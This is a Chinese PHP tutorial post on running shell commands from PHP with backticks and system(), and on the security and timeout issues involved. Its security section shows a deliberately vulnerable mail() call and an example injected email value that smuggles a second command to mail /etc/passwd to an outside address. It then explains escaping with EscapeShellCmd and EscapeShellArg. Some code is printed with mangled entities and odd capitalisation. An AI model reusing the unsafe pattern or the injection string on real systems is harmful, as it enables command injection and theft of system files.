分享

在PHP运行外部的系统命令4

 yliu277 2015-04-29
这个方法以前没有归入PHP的文档,是作为一个秘技存在的。方法很简单,用两个反撇号把要执行的命令括起来作为一个表达式,这个表达式的值就是命令执行的结果。如:
$#@60;?
$res=`/bin/ls -l`;
echo "$#@60;b$#@62;$#@60;Pre$#@62;".$res."$#@60;Pre$#@62;$#@60;/b$#@62;";
$#@62;

这个脚本的输出就象:
hunte.gif
hunte.PPm
jPg.htm
jPg.jPg
Passthru.PhP

要考虑些什么?

要考虑两个问题:安全性和超时。

  先看安全性。比如,你有一家小型的网上商店,所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件,让你的用户输入他们的EMAIL地址,然后把这个产品列表发给他们。假设你没有使用PHP的mail()函数(或者从未听说过),你就调用Linux/Unix 系统的mail程序来发送这个文件。程序就象这样:
$#@60;?
 system("mail $to $#@60; Products.txt");
 echo "我们的产品目录已经发 送到你的信箱:$to";
$#@62;

  用这段代码,一般的用户不会产生什么危险,但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一 个EMAIL地址:
"--bla ; mail someone@domain.com $#@60; /etcPasswd ;"

  那么这条命令最终变成:
"mail --bla ; mail someone@domain.com $#@60; /etcPasswd ; $#@60; Products.txt"

我相信,无论哪个网络管理人员见到这样的命令,都会吓出一身冷汗来。

  幸好,PHP为我们提供了两个函数:EscaPeShellCmd() 和EscaPeShellArg()。函数EscaPeShellCmd把一个字符串中所有可能瞒过Shell而去执行另外一个 命令的字符转义。这些字符在Shell中是有特殊含义的,象分号(),重定向($#@62;)和从文件读 入($#@60;)等。函数EscaPeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符串就可以安全地作为命令的参数。

  再来看看超时问题。如果要执行的命令要花费很长的时间,那么应该把这个命令放到系统的后台去运行。但在默认情况下,象system()等函数要等到这个命令运行完才返回(实际上是要等命令的输 出结果),这肯定会引起PHP脚本的超时。解决的办法是把命令的输出重定向到另外一个文件或流中,如:

$#@60;?
system("/usr/local/bin/order_Proc $#@62; /tmP/null &");
$#@62;

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多